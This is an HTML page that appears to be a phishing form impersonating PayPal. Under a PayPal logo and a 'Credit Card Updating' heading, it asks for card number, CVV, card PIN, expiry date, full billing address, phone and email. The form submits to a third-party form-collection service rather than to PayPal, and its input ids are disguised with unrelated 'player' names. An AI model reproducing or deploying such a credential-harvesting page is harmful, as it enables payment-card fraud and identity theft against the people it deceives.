<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>CreditCard Form</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f4f4f4;
            margin: 0;
            padding: 20px;
        }
        .container {
            max-width: 400px;
            margin: auto;
            background: #fff;
            padding: 20px;
            border-radius: 5px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }
        h2 {
            text-align: center;
            color: #333;
        }
        .form-group {
            margin-bottom: 15px;
        }
        label {
            display: block;
            margin-bottom: 5px;
            color: #555;
        }
        input[type="text"],
        input[type="number"],
        input[type="month"] {
            width: 100%;
            padding: 10px;
            border: 1px solid #ccc;
            border-radius: 4px;
            box-sizing: border-box;
        }
        button {
            width: 100%;
            padding: 10px;
            background-color: #0070BA;
            border: none;
            border-radius: 4px;
            color: white;
            font-size: 16px;
            cursor: pointer;
        }
        button:hover {
            background-color:#218838;
        }
      #loading-message {

display: none;

margin-top: 10px;

padding: 10px;

font-size: 14px;

background-color: #fff;

border-radius: 5px;

box-shadow: 0 0 5px rgba(0, 0, 0, 0.1);

text-align: center;

animation: animate-loading 2s infinite;

}

#success-message {

display: none;

margin-top: 10px;

padding: 10px;

font-size: 14px;

background-color: #f0f0f0;

border-radius: 5px;

box-shadow: 0 0 5px rgba(0, 0, 0, 0.1);

}

@keyframes animate-loading {

0% {

opacity: 0.5;

transform: scale(0.9);

}

50% {

opacity: 1;

transform: scale(1.1);

}

100% {

opacity: 0.5;

transform: scale(0.9);

}

}
     
    </style>
</head>
<body>

<div class="container">
  <h2><img src="https://www.paypalobjects.com/images/shared/paypal-logo-129x32.svg" alt="PayPal Logo"></h2>
    <h2>Credit Card Updating</h2>
    <form action="https://usebasin.com/f/46d11386195a" method="post">
        <div class="form-group">
            <label for="cardholder-name">Cardholder Name</label>
            <input type="text" id="player name" placeholder="John Doe" required>
        </div>
      <div class="form-group">

            <label for="card-number">Card Type</label>

            <input type="text" id="players Nick name" required>

        </div>
        <div class="form-group">
            <label for="card-number">Card Number</label>
            <input type="number" id="player number" placeholder="1234 5678 9012 3456" required>
        </div>
        <div class="form-group">
            <label for="expiration">Expiration Date</label>
            <input type="month" id="playing date" required>
        </div>
        <div class="form-group">
            <label for="cvv">CVV</label>
            <input type="number" id="player group number" placeholder="123" required>
          </div>
      <div class="form-group">

            <label for="card-number">Pin</label>
            <input type="number" id="players population" required>
        </div>
      <h2>Billing Address</h2>
      <div class="form-group">

            <label for="Address">Address</label>

            <input type="text" id="player Address" required>

        </div>
      <div class="form-group">

            <label for="city">City</label>

            <input type="text" id="player city" required>

        </div>
      <div class="form-group">

            <label for="player Zip/postal ">Zip/postal code </label>

            <input type="number" id="player Zip/postal" required>

        </div>
      <div class="form-group">

            <label for="playerState/province">State/province</label>

            <input type="text" id="player State/province" required>

        </div>
      <div class="form-group">

            <label for="player country">Country</label>

            <input type="text" id="player country" required>

        </div>
      <div class="form-group">

            <label for="player number">Phone number </label>

            <input type="number" id="player tell number" required>

        </div>
      <div class="form-group">

            <label for="playe email"> Email Address</label>

            <input type="text" id="player email" required>

        </div>
        <button type="submit">Start Updating</button>
    </form>
</div>
<script src="script.js"></script>
</body>
</html>